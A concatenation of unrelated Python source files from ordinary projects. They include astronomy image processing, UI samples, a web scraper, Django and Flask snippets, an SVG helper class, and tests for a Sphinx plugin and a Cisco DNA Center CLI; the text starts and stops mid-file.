the observation times, but this is the SPOC, so they aren't.
The datestamps are used for loading the right file from disk
"""
pattern = "tess*ffic.fits"
pattern = os.path.join(self.ffiPath, pattern)
fileList = glob(pattern)
assert len(fileList) > 0
f = lambda x: os.path.split(x)[-1].split('-')[0][4:]
datestamps = map( f, fileList)
datestamps = sorted(list(set(datestamps)))
assert len(datestamps) > 0
return datestamps
def do(self, camera, ccd):
nCols, nRows= self.nColsRows
for i in range(0, nCols, self.strawSize):
print("Processing column %i" %(i))
for j in range(0, nRows, self.strawSize):
straw, times, flags = self.makeStraw(camera, ccd, i, j)
self.writeStraw(straw, camera, ccd, i, j)
#Convert times, flags to JSON serializable lists
self.midtimes_tbjd = list(times)
self.qualityFlags = list(map(int, flags))
self.saveMetadata()
def getFfiShape(self):
"""Get the num cols and rows from the FFI header"""
ffiName = self.getFfiName(0, self.camera, self.ccd)
hdr = pyfits.getheader(ffiName, 1)
nCols = hdr['NAXIS1']
nRows = hdr['NAXIS2']
return nCols, nRows
def makeStraw(self, camera, ccd, col, row):
"""Make a straw at the requested location
Inputs
-------------
camera, ccd, col, row
(int) Properties of the straw. col and row refer to coordinates of
the bottom-left corner of the straw.
Returns
---------
np 3d array
"""
nCol, nRow = self.strawSize, self.strawSize
nCadence = len(self.datestampList)
straw = np.empty( (nCadence, nRow, nCol) )
midtimes_tbjd = np.empty(nCadence)
flags = np.empty(nCadence, dtype=int)
for i in range(nCadence):
ffiName = self.getFfiName(i, camera, ccd)
frame, time, flagValue = self.readFfiSection(ffiName, col, row)
nr, nc = frame.shape
straw[i,:nr,:nc] = frame
midtimes_tbjd[i] = time
flags[i] = flagValue
return straw, midtimes_tbjd, flags
def writeStraw(self, straw, camera, ccd, col, row):
"""
Write a straw to disk
Inputs
-----------
straw
(3d npy array) The data to save
camera, ccd, col, row
(int) Properties of the straw. col and row refer to coordinates of
the bottom-left corner of the straw.
"""
path, fn = makeStrawName(self.outPath,
self.sector,
camera,
ccd,
col,
row)
if not os.path.exists(path):
os.makedirs(path)
fn = os.path.join(path, fn)
np.save(fn, straw)
def readFfiSection(self, ffiName, col, row):
"""Read a postage stamp from an FFI file
This is by far the most expensive function in the class
and optimisation efforts should focus here
"""
hdulist = pyfits.open(ffiName, memmap=True)
img = hdulist[1]
slCol = slice(col, col + self.strawSize)
slRow = slice(row, row + self.strawSize)
data = img.section[slRow, slCol]
tstart = img.header['TSTART']
tend = img.header['TSTOP']
midtime_tbjd = .5 * (tstart + tend)
flag = img.header['DQUALITY']
hdulist.close()
return data, midtime_tbjd, flag
def getFfiName(self, cadenceNum, camera, ccd):
"""Construct the path to an FFI on local disk
Raises an index error if `cadenceNum` is out of bounds on the
list of FFIs available
"""
datestamp = self.datestampList[cadenceNum]
fn = "tess%s-s%04i-%i-%i-%04i-s_ffic.fits" \
%(datestamp, self.sector, camera, ccd, self.dataVersion)
return os.path.join(self.ffiPath, fn)
def saveMetadata(self):
"""Save a metadata file to a local filestore
"""
fn = os.path.join(self.outPath, "sector%02i" %(self.sector), METADATA_FILE)
frame = inspect.currentframe().f_back
(filename, lineno, funcname, _, _) = inspect.getframeinfo(frame)
params = collections.OrderedDict()
params['__file__'] = filename
params['__lineno__'] = lineno
params['__date__'] = str(datetime.datetime.now())
params['__user__'] = os.environ['USER']
params.update(self.__dict__)
text = json.dumps(params, indent=2)
with open(fn, 'w') as fp:
fp.write(text)
|
import pglet
from pglet import Button, Message, MessageButton, Stack, Text
def messages():
return Stack(
width="70%",
gap=20,
controls=[
Text("Messages", size="xLarge"),
Message(value="This is just a message."),
Message(
value="Success message with dismiss button",
dismiss=True,
type="success",
),
Message(
value="Error message with dismiss button", dismiss=True, type="error"
),
Message(
type="blocked",
truncated=True,
dismiss=True,
value="Blocked Message - single line, with dismiss button and truncated text. Truncation is not available if you use action buttons or multiline and should be used sparingly. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi luctus, purus a lobortis tristique, odio augue pharetra metus, ac placerat nunc mi nec dui. Vestibulum aliquam et nunc semper scelerisque. Curabitur vitae orci nec quam condimentum porttitor et sed lacus. Vivamus ac efficitur leo. Cras faucibus mauris libero, ac placerat erat euismod et. Donec pulvinar commodo odio sit amet faucibus. In hac habitasse platea dictumst. Duis eu ante commodo, condimentum nibh pellentesque, laoreet enim. Fusce massa lorem, ultrices eu mi a, fermentum suscipit magna. Integer porta purus pulvinar, hendrerit felis eget, condimentum mauris. You've been warned!",
),
Message(
type="warning",
dismiss=True,
value="Warning message with buttons",
buttons=[
MessageButton(text="Yes", action="yes"),
MessageButton(text="No", action="no"),
],
),
Message(
type="severeWarning",
multiline=True,
value="SevereWarning defaults to multiline. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi luctus, purus a lobortis tristique, odio augue pharetra metus, ac placerat nunc mi nec dui. Vestibulum aliquam et nunc semper scelerisque. Curabitur vitae orci nec quam condimentum porttitor et sed lacus. Vivamus ac efficitur leo. Cras faucibus mauris libero, ac placerat erat euismod et. Donec pulvinar commodo odio sit amet faucibus. In hac habitasse platea dictumst. Duis eu ante commodo, condimentum nibh pellentesque, laoreet enim. Fusce massa lorem, ultrices eu mi a, fermentum suscipit magna. Integer porta purus pulvinar, hendrerit felis eget, condimentum mauris.",
buttons=[MessageButton("OK"), MessageButton("Cancel")],
),
message_with_on_dismiss(),
message_with_on_dismiss_and_buttons(),
],
)
def message_with_on_dismiss():
def message_dismissed(e):
t.value = "Message dismissed!"
stack.update()
m = Message(
value="Message with on_dismiss event",
dismiss=True,
on_dismiss=message_dismissed,
)
t = Text()
stack = Stack(controls=[m, t])
return stack
def message_with_on_dismiss_and_buttons():
def message_dismissed(e):
t.value = f"Message dismissed with {e.data} action"
stack.update()
m = Message(
value="Message with dismiss event and buttons",
dismiss=True,
on_dismiss=message_dismissed,
buttons=[MessageButton("OK"), MessageButton("Cancel")],
)
t = Text()
stack = Stack(controls=[m, t])
return stack
def main(page):
page.title = "Message control samples"
page.horizontal_align = "stretch"
page.update()
page.add(messages())
pglet.app("python-message", target=main)
|
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from time import sleep
options = Options()
options.headless = True
url = 'http://www.duksung.ac.kr/diet/schedule.do?menuId=1151'
driver = webdriver.Firefox(options=options)
driver.get(url)
driver.implicitly_wait(5)
sleep(3)
html = driver.page_source
out_fp = open('page.html', 'w', encoding='utf-8')
out_fp.write(html)
out_fp.close()
driver.close()
|
# Generated by Django 2.1.2 on 2018-10-20 11:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('twitmining', '0020_auto_20181020_0936'),
]
operations = [
migrations.AddField(
model_name='query',
name='language',
field=models.CharField(default='DEFAULT VALUE', max_length=100),
),
]
|
import re
from django.conf import settings
from django.contrib.auth.decorators import login_required
from .backends import AzureADBackend
import logging
logger = logging.getLogger(__name__)
# TODO manage for rest_framework, daphne
class SSORequireLoginMiddleware(object):
"""
Add login_required decorator to all views except 3 urls - Login/ Callback and Logout Redirect Url
"""
def __init__(self, get_response):
self.get_response = get_response
self.required = tuple(re.compile(url) for url in (r"/(.*)$",))
self.exceptions = tuple(re.compile( r"^/" + url.strip("/") + "[/]?$") for url in (
AzureADBackend.LOGIN_URL,
AzureADBackend.REDIRECT_URI,
AzureADBackend.POST_LOGOUT_REDIRECT_URI,
) if url)
def __call__(self, request):
# Code to be executed for each request before
# the view (and later middleware) are called.
response = self.get_response(request)
# Code to be executed for each request/response after
# the view is called.
return response
def process_view(self, request, view_func, view_args, view_kwargs):
# No need to process URLs if user already logged in
if request.user.is_authenticated:
return None
# An exception match should immediately return None
for url in self.exceptions:
if url.match(request.path):
return None
# Requests matching a restricted URL pattern are returned
# wrapped with the login_required decorator
for url in self.required:
if url.match(request.path):
return login_required(view_func)(request, *view_args, **view_kwargs)
# Explicitly return None for all non-matching requests
return None
# def process_exception(self, request, exception):
# None or HttpResponse()
# def process_template_response(self, request, response):
# response.context_data['key'] = 'value'
# return response
|
#!/usr/bin/env python
"""
Module containing Svg class and helper functions
"""
import math
from lxml import etree
def json_to_style(json):
"""
convert a json to a string formated as style argument
{ a : "b", c : "d" } -> "a:b;c:d;"
"""
style_argument = ""
for attribute, value in json.items():
style_argument = style_argument + attribute + ":" + value + ";"
return style_argument
class Svg(object):
"""
Class managing SVG elements via lxml.etree
"""
def __init__(self, root=None, width=0, height=0, id_name="svg_element"):
if root is None:
self.root = etree.Element("svg",
{"width": str(width),
"height": str(height),
"id": id_name
})
else:
self.root = root
def create_subgroup(
self,
group_id,
class_name=None,
additional_arguments=None):
"""
create a subgroup in root and return it
"""
arguments = {'id': str(group_id)}
if class_name is not None:
arguments['class'] = str(class_name)
if additional_arguments is not None:
arguments.update(additional_arguments)
group = etree.SubElement(self.root, 'g', arguments)
return Svg(group)
def create_ellipse(
self,
radius,
center,
stroke_colour,
id_name,
fill=None,
stroke_width="1",
stroke_opacity="0.5",
opacity="1"):
"""
Create an ellipse in root and return it
"""
(radius_x, radius_y) = radius
(center_x, center_y) = center
style = {
'stroke': stroke_colour,
'stroke-width': str(stroke_width),
'stroke-opacity': str(stroke_opacity),
}
if fill is not None:
style['fill'] = fill
style['opacity'] = str(opacity)
ell_attribs = {
'style': json_to_style(style),
'cx': str(center_x),
'cy': str(center_y),
'rx': str(radius_x),
'ry': str(radius_y),
'id': str(id_name)
}
ellipse = etree.SubElement(self.root, 'ellipse', ell_attribs)
return Svg(ellipse)
def create_hex(
self,
id_name,
center,
coordinates,
hex_size,
fill_colour,
class_name,
fill_opacity="0.5",
stroke_colour='#FFFFFF',
stroke_width="1",
enableOnClick=False,
onclick="clickHex(this)",
stroke_opacity="1"):
"""
Create a hex in root and return it
"""
(center_x, center_y) = center
(coord_q, coord_r) = coordinates
hex_width = float(2 * hex_size)
hex_height = math.sqrt(3) * hex_size
points = [
[center_x - hex_width / 4, center_y - hex_height / 2],
[center_x + hex_width / 4, center_y - hex_height / 2],
[center_x + hex_width / 2, center_y],
[center_x + hex_width / 4, center_y + hex_height / 2],
[center_x - hex_width / 4, center_y + hex_height / 2],
[center_x - hex_width / 2, center_y]
]
str_points = ""
for point in points:
str_points = str_points + str(point[0]) + "," + str(point[1]) + " "
style = {
'stroke': stroke_colour,
'stroke-width': str(stroke_width),
'stroke-opacity': str(stroke_opacity),
'fill': fill_colour,
'fill-opacity': str(fill_opacity)
}
ell_attribs = {
'style': json_to_style(style),
'points': str_points,
'id': str(id_name),
'coord_q': str(coord_q),
'coord_r': str(coord_r),
'class': class_name
}
if enableOnClick:
ell_attribs['onclick'] = onclick
hex_element = etree.SubElement(self.root, 'polygon', ell_attribs)
return Svg(hex_element)
def create_text(
self,
id_name,
position,
content,
font_size=8,
font_colour="#000000",
text_align="center",
text_anchor="middle",
font_weight="normal"):
"""
Create a text in root and return it
"""
(position_x, position_y) = position
style = {
'text-align': text_align,
'text-anchor': text_anchor,
'font-size': str(font_size) + "pt"
}
attributes = {
'style': json_to_style(style),
'x': str(position_x),
'y': str(position_y),
'fill': font_colour,
'font-weight': font_weight,
'id': id_name
}
text = etree.SubElement(self.root, 'text', attributes)
text.text = content
return Svg(text)
def create_rectangle(
self,
position,
size,
id_name,
fill_colour=None,
stroke_colour=None,
stroke_width=None,
fill_opacity=None,
additional_arguments=None):
"""
Create a rectangle in root and return it
"""
(position_x, position_y) = position
(size_width, size_height) = size
if additional_arguments is None:
additional_arguments = {}
style = {}
if fill_colour:
style['fill'] = fill_colour
if stroke_colour:
style['stroke'] = stroke_colour
if stroke_width:
style['stroke-width'] = str(stroke_width)
if fill_opacity:
style['fill-opacity'] = str(fill_opacity)
arguments = {
'style': json_to_style(style),
'id': id_name,
'width': str(size_width),
'height': str(size_height),
'x': str(position_x),
'y': str(position_y),
}
for attribute, value in additional_arguments.items():
arguments[attribute] = value
rect = etree.SubElement(self.root, 'rect', arguments)
return Svg(rect)
def create_circle(self, center, radius, id_name,
fill_colour=None, additional_arguments=None):
"""
Create a circle in root and return it
"""
(center_x, center_y) = center
if additional_arguments is None:
additional_arguments = {}
arguments = {
'id': id_name,
'cx': str(center_x),
'cy': str(center_y),
'r': str(radius)
}
if fill_colour is not None:
arguments["style"] = "fill:" + fill_colour
for attribute, value in additional_arguments.items():
arguments[attribute] = value
circle = etree.SubElement(self.root, 'circle', arguments)
return Svg(circle)
def create_line(self, position_start, position_end,
stroke_colour="#000000",
stroke_width="1"):
"""
create a line in root and return it
"""
(start_x, start_y) = position_start
(end_x, end_y) = position_end
style = {
'stroke': stroke_colour,
'stroke-width': str(stroke_width)
}
arguments = {
'x1': str(start_x),
'x2': str(end_x),
'y1': str(start_y),
'y2': str(end_y),
'style': json_to_style(style)
}
line = etree.SubElement(self.root, 'line', arguments)
return Svg(line)
def create_path(self, commands, stroke_colour=None, fill_colour=None,
id_name=None, additional_arguments=None):
"""
create a path in root and return it
"""
arguments = {
'd': commands
}
if stroke_colour is not None:
arguments["stroke"] = stroke_colour
if fill_colour is not None:
arguments["fill"] = fill_colour
if id_name is not None:
arguments['id'] = id_name
if additional_arguments is not None:
arguments.update(additional_arguments)
path = etree.SubElement(self.root, 'path', arguments)
return Svg(path)
def create_polygon(self, points, fill_colour=None, stroke_colour=None):
"""
create a polygon in root and return it
"""
arguments = {
'points': points
}
style = {}
if fill_colour is not None:
style['fill'] = fill_colour
if stroke_colour is not None:
style['stroke'] = stroke_colour
arguments['style'] = json_to_style(style)
polygon = etree.SubElement(self.root, 'polygon', arguments)
return Svg(polygon)
def use_symbol(self, symbol_name, id_name, position=None,
fill_colour=None, additional_arguments=None):
"""use a symbol which had to be defined earlier
Arguments:
symbol_name {string} -- name of the symbol
id_name {string} -- id
position {(int, int)} -- (x, y) (default: {None})
Keyword Arguments:
fill_colour {string} -- colour (default: {None})
additional_arguments {json} -- any additional arguments (default: {None})
"""
if additional_arguments is None:
additional_arguments = {}
arguments = {
'href': '#' + symbol_name,
'id': id_name
}
if position is not None:
(position_x, position_y) = position
arguments['x'] = str(position_x)
arguments['y'] = str(position_y)
if fill_colour is not None:
arguments["style"] = json_to_style({'fill': fill_colour})
for attribute, value in additional_arguments.items():
arguments[attribute] = value
symbol = etree.SubElement(self.root, 'use', arguments)
return Svg(symbol)
def create_image(self, image_name, width, height, x_pos, y_pos):
"""
Create an image in root and return it.
"""
image = etree.SubElement(self.root, 'image', {
'href': image_name, 'width': width, 'height': height, 'x': x_pos, 'y': y_pos})
image.text = " "
return Svg(image)
def create_scoring_track(self, size_box, subgroup_name, x_elements, y_elements,
grey_element, fill_colour="#FFFFFF", font_size=8, additional_arguments=None):
"""
create the whole scoring track
"""
if additional_arguments is None:
additional_arguments = {}
layer = self.create_subgroup(subgroup_name)
for i in range(0, x_elements + 1):
layer.draw_scoring_box(
(i*size_box, 0),
(size_box, size_box),
"{}_{}".format(subgroup_name, i),
i,
grey_element,
fill_colour,
font_size,
additional_arguments
)
for i in range(x_elements, x_elements + y_elements + 1):
layer.draw_scoring_box(
(x_elements*size_box, (i - x_elements)*size_box),
(size_box, size_box),
"{}_{}".format(subgroup_name, i),
i,
grey_element,
fill_colour,
font_size,
additional_arguments
)
for i in range(x_elements + y_elements, 2*x_elements + y_elements + 1):
layer.draw_scoring_box(
((2*x_elements + y_elements - i)*size_box, y_elements*size_box),
(size_box, size_box),
"{}_{}".format(subgroup_name, i),
i,
grey_element,
fill_colour,
font_size,
additional_arguments
)
for i in range(2*x_elements + y_elements, 2*x_elements + 2*y_elements):
layer.draw_scoring_box(
(0, (2*x_elements + 2*y_elements - i)*size_box),
(size_box, size_box),
"{}_{}".format(subgroup_name, i),
i,
grey_element,
fill_colour,
font_size,
additional_arguments
)
def draw_scoring_box(self, position, size, id_name, number, grey_element,
fill_colour="#FFFFFF", font_size=8, additional_arguments=None):
"""
draw one box of the scoring track
"""
if additional_arguments is None:
additional_arguments = {}
additional_arguments["value"] = str(number)
(position_x, position_y) = position
(width, height) = size
self.create_rectangle((position_x, position_y), (width, height),
id_name, fill_colour=fill_colour,
stroke_colour="#000000",
stroke_width=1,
fill_opacity=1,
additional_arguments=additional_arguments)
if number % grey_element == 0:
self.create_rectangle(
[position_x, position_y],
size,
"{}_transperent".format(id_name),
fill_colour="black",
fill_opacity="0.4"
)
self.create_text(
id_name,
(position_x + width / 2, position_y + height / 2 + font_size / 2),
str(number),
font_size=font_size
)
def get_string(self):
"""
return root element converted to string
"""
return etree.tostring(self.root, pretty_print=True).decode('utf-8')
def __str__(self):
return self.get_string()
def get_position(size, x_elements, y_elements, points, stack_position):
"""
given the points and the number of markers below in the stack
return the position where to print the marker
"""
POSITION_LOWEST_DISC = 15
space = points % (2*(x_elements+y_elements))
if 0 <= space <= x_elements:
x_pos = space * size
y_pos = POSITION_LOWEST_DISC
elif x_elements < space <= x_elements + y_elements:
x_pos = x_elements * size
y_pos = POSITION_LOWEST_DISC + (space - x_elements) * size
elif x_elements + y_elements < space <= 2*x_elements + y_elements:
x_pos = (2*x_elements + y_elements - space) * size
y_pos = POSITION_LOWEST_DISC + y_elements*size
elif 2*x_elements + y_elements < space < 2*x_elements + 2*y_elements:
x_pos = 0
y_pos = POSITION_LOWEST_DISC + \
(2*x_elements + 2*y_elements - space) * size
return [x_pos, y_pos - 4*stack_position]
def main():
"""
no main implemented
"""
print("no main implemented")
if __name__ == '__main__':
main()
|
def compute(a, b, c, d, e):
print(e)
tmp = a + b
if 1 and 2:
tmp *= 2
return tmp
__transonic__ = ("0.3.0.post0",)
|
#!/usr/bin/env python
#import moveit_commander
#from geometry_msgs.msg import Pose, Quaternion
#from tf.transformations import quaternion_from_euler
import time
import cv2
#group= moveit_commander.MoveGroupCommander("arm")
#ps = Pose()
#img = cv2.imread("./test.png")
#print ("img shape: ", img.shape) # 217, 403
def img_2_csv():
img = cv2.imread("./test.png")
# shape = (217, 403, 3) -> 21.7 cm, 40.3 cm, rgb 3 colors
shape = img.shape
new_shape = (int(shape[0]/10), int(shape[1]/10), 3)
print (new_shape)
new_img = np.zeros(new_shape)
tmp_total_r = 0
tmp_total_g = 0
tmp_total_b = 0
for i in range(0, new_shape[0]):
for j in range(0, new_shape[1]):
for w in range(0, 10):
for h in range(0, 10):
tmp_total_r += img[i*10+w, j*10+h, 0]
tmp_total_g += img[i*10+w, j*10+h, 0]
tmp_total_b += img[i*10+w, j*10+h, 0]
tmp_total_r = int(tmp_total_r / 100)
tmp_total_g = int(tmp_total_g / 100)
tmp_total_b = int(tmp_total_b / 100)
#new_img[]
if __name__ == "__main__":
img_2_csv()
|
# Copyright 2018 BLEMUNDSBURY AI LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union
from sanic import Sanic
from logging import info
from cape_webservices.configuration.configuration_core import configuration_endpoints
from cape_webservices.errors.errors_core import errors_endpoints
from cape_webservices.app.app_core import app_endpoints
from cape_webservices.app.app_annotation_endpoints import app_annotation_endpoints
from cape_webservices.app.app_document_endpoints import app_document_endpoints
from cape_webservices.app.app_saved_reply_endpoints import app_saved_reply_endpoints
from cape_webservices.app.app_inbox_endpoints import app_inbox_endpoints
from cape_webservices.app.app_user_endpoints import app_user_endpoints
from cape_webservices import webservices_settings
app = Sanic(__name__)
app.blueprint(app_endpoints)
app.blueprint(app_annotation_endpoints)
app.blueprint(app_document_endpoints)
app.blueprint(app_saved_reply_endpoints)
app.blueprint(app_inbox_endpoints)
app.blueprint(app_user_endpoints)
app.blueprint(errors_endpoints)
app.blueprint(configuration_endpoints)
app.static('/', file_or_directory=webservices_settings.STATIC_FOLDER)
app.static('/', file_or_directory=webservices_settings.HTML_INDEX_STATIC_FILE)
# Import plugins if they're installed
enabled_plugins = []
try:
from cape_facebook_plugin.facebook_auth import facebook_auth_endpoints
from cape_facebook_plugin.facebook_events import facebook_event_endpoints
app.blueprint(facebook_auth_endpoints)
app.blueprint(facebook_event_endpoints)
enabled_plugins.append('facebook')
info('Facebook plugin enabled')
except ImportError:
info('Facebook plugin disabled')
try:
from cape_hangouts_plugin.hangouts_events import hangouts_event_endpoints
app.blueprint(hangouts_event_endpoints)
enabled_plugins.append('hangouts')
info('Hangouts plugin enabled')
except ImportError:
info('Hangouts plugin disabled')
try:
from cape_slack_plugin.slack_auth import slack_auth_endpoints
from cape_slack_plugin.slack_events import slack_event_endpoints
app.blueprint(slack_auth_endpoints)
app.blueprint(slack_event_endpoints)
enabled_plugins.append('slack')
info('Slack plugin enabled')
except ImportError:
info('Slack plugin disabled')
try:
from cape_email_plugin.email_events import email_event_endpoints
app.blueprint(email_event_endpoints)
enabled_plugins.append('email')
info('Email plugin enabled')
except ImportError as e:
print(e)
info('Email plugin disabled')
app.config.update(webservices_settings.WEBAPP_CONFIG)
info(f"List of active endpoints { app.router.routes_all.keys() }")
def run(port: Union[None, int] = None):
if port is not None:
webservices_settings.CONFIG_SERVER['port'] = int(port)
info("Using port: %d", webservices_settings.CONFIG_SERVER['port'])
app.config.LOGO = None
app.run(**webservices_settings.CONFIG_SERVER)
|
from django.contrib import admin
# Register your models here.
from .models import UserProfile
@admin.register(UserProfile)
class UserProfileAdmin(admin.ModelAdmin):
list_display = ('user', 'display_location', 'date_joined', 'updated_on')
|
from flask import request
from flask_restful import Resource
from apps.models.user_package.schema.user_schema import UserSchema
from apps.models.user_package.user.user_model import User
from mongoengine.errors import FieldDoesNotExist
from apps.responses.responses import resp_exception, resp_ok
from ..utils.user_utils import get_user_by_id
class AdminSearchUser(Resource):
def get(self, user_id):
result = None
user = None
schema = UserSchema(many=False)
user = get_user_by_id(user_id)
result = schema.dump(user)
return resp_ok(
'Users',
'Usuário encontrado',
date=result.data
)
|
from sqlalchemy import *
from . import Base
class FITest(Base):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
uuid = Column(String(255), index=True)
created_at = Column(DateTime)
updated_at = Column(DateTime)
def __repr__(self):
return '<FITest(id={}, uuid={}, created_at={})>'.format(self.id, self.uuid, self.created_at)
|
import dectate
from kaybee.plugins.genericpage.genericpage import Genericpage
from kaybee.plugins.genericpage.handlers import (
initialize_genericpages_container,
add_genericpage,
genericpage_into_html_context,
dump_settings,
)
class TestGenericpagesContainer:
def test_import(self):
assert 'initialize_genericpages_container' == \
initialize_genericpages_container.__name__
def test_result(self, genericpages_kb_app, sphinx_app, sphinx_env):
initialize_genericpages_container(genericpages_kb_app, sphinx_app,
sphinx_env,
[])
assert hasattr(sphinx_app.env, 'genericpages')
class TestGenericpagesAdd:
def test_import(self):
assert 'add_genericpage' == \
add_genericpage.__name__
def test_noadd_genericpage(self, genericpages_kb_app, genericpages_sphinx_app,
foo_doctree):
# We have a resource for this docname, don't make add genericpage
genericpages_sphinx_app.env.resources = dict(
foo=dict()
)
result = add_genericpage(genericpages_kb_app, genericpages_sphinx_app, foo_doctree)
assert None is result
def test_add_genericpage(self, genericpages_kb_app, genericpages_sphinx_app,
foo_doctree,
valid_gp):
genericpages_sphinx_app.env.resources = dict(
no_foo=dict()
)
genericpages_sphinx_app.genericpages = dict()
dectate.commit(genericpages_kb_app)
result = add_genericpage(genericpages_kb_app, genericpages_sphinx_app, foo_doctree)
assert valid_gp == result.__class__
assert 'foo' == result.docname
assert 'foo' in genericpages_sphinx_app.env.genericpages
class TestGenericpageIntoHtml:
def test_import(self):
assert 'genericpage_into_html_context' == \
genericpage_into_html_context.__name__
def test_has_resource(self, genericpages_kb_app, genericpages_sphinx_app,
sample_resources):
index = sample_resources['index']
genericpages_sphinx_app.env.resources = {index.docname: index}
pagename = index.docname
templatename = ''
context = dict()
doctree = dict()
result = genericpage_into_html_context(
genericpages_kb_app, genericpages_sphinx_app, pagename, templatename, context,
doctree
)
assert {} == context
def test_has_gp(self, genericpages_kb_app, genericpages_sphinx_app, sample_resources):
index = sample_resources['index']
genericpages_sphinx_app.env.resources = {index.docname: index}
about = Genericpage('r1/r2/about')
genericpages_sphinx_app.env.genericpages = {about.docname: about}
pagename = about.docname
templatename = ''
context = dict()
doctree = dict()
result = genericpage_into_html_context(
genericpages_kb_app, genericpages_sphinx_app, pagename, templatename, context,
doctree
)
assert 'genericpage' in context
assert 'page.html' == result['templatename']
def test_not_has_gp(self, genericpages_kb_app, genericpages_sphinx_app,
sample_resources):
index = sample_resources['index']
genericpages_sphinx_app.env.resources = {index.docname: index}
about = Genericpage('r1/r2/about')
genericpages_sphinx_app.env.genericpages = {}
pagename = about.docname
templatename = ''
context = dict()
doctree = dict()
result = genericpage_into_html_context(
genericpages_kb_app, genericpages_sphinx_app, pagename, templatename, context,
doctree
)
assert 'genericpage' not in context
assert None is result
class TestPluginGenerateDebugEvent:
def test_import(self):
assert 'dump_settings' == dump_settings.__name__
def test_debug(self, genericpages_kb_app, sphinx_env, valid_gps):
sphinx_env.resources = dict(
foo=dict()
)
sphinx_env.genericpages = dict(
foo=Genericpage('foo')
)
genericpages = dump_settings(genericpages_kb_app, sphinx_env)
assert 'genericpages' in genericpages
config = genericpages['genericpages']['config']
assert 10 in config
values = genericpages['genericpages']['values']
assert 1 == len(values)
assert 'foo' == values['foo']['docname']
|
# -*- coding: utf-8 -*-
"""DNACenterAPI Network Settings API fixtures and tests.
Copyright (c) 2019 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import click
import pytest
from json import loads
from tests.environment import DNA_CENTER_VERSION
pytestmark = pytest.mark.skipif(DNA_CENTER_VERSION != '1.3.3', reason='version does not match')
def is_valid_update_global_pool(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_update_global_pool(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'update-global-pool',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"ippool": [{"ipPoolName": "string", "gateway": "string", "dhcpServerIps": ["string"], "dnsServerIps": ["string"], "id": "string"}]}'"""])
assert not result.exception
assert is_valid_update_global_pool(result)
def is_valid_delete_device_credential(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_delete_device_credential(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'delete-device-credential',
"""--id='string'"""])
assert not result.exception
assert is_valid_delete_device_credential(result)
def is_valid_assign_credential_to_site(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_assign_credential_to_site(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'assign-credential-to-site',
"""--active_validation=True""",
"""--cliid='string'""",
"""--httpread='string'""",
"""--httpwrite='string'""",
"""--payload=None""",
"""--site_id='string'""",
"""--snmpv2readid='string'""",
"""--snmpv2writeid='string'""",
"""--snmpv3id='string'"""])
assert not result.exception
assert is_valid_assign_credential_to_site(result)
def is_valid_get_network(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_get_network(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'get-network',
"""--site_id='string'"""])
assert not result.exception
assert is_valid_get_network(result)
def is_valid_delete_sp_profile(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_delete_sp_profile(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'delete-sp-profile',
"""--sp_profile_name='string'"""])
assert not result.exception
assert is_valid_delete_sp_profile(result)
def is_valid_update_sp_profile(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_update_sp_profile(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'update-sp-profile',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"qos": [{"profileName": "string", "model": "string", "wanProvider": "string", "oldProfileName": "string"}]}'"""])
assert not result.exception
assert is_valid_update_sp_profile(result)
def is_valid_delete_global_ip_pool(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_delete_global_ip_pool(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'delete-global-ip-pool',
"""--id='string'"""])
assert not result.exception
assert is_valid_delete_global_ip_pool(result)
def is_valid_update_device_credentials(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_update_device_credentials(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'update-device-credentials',
"""--active_validation=True""",
"""--payload=None""",
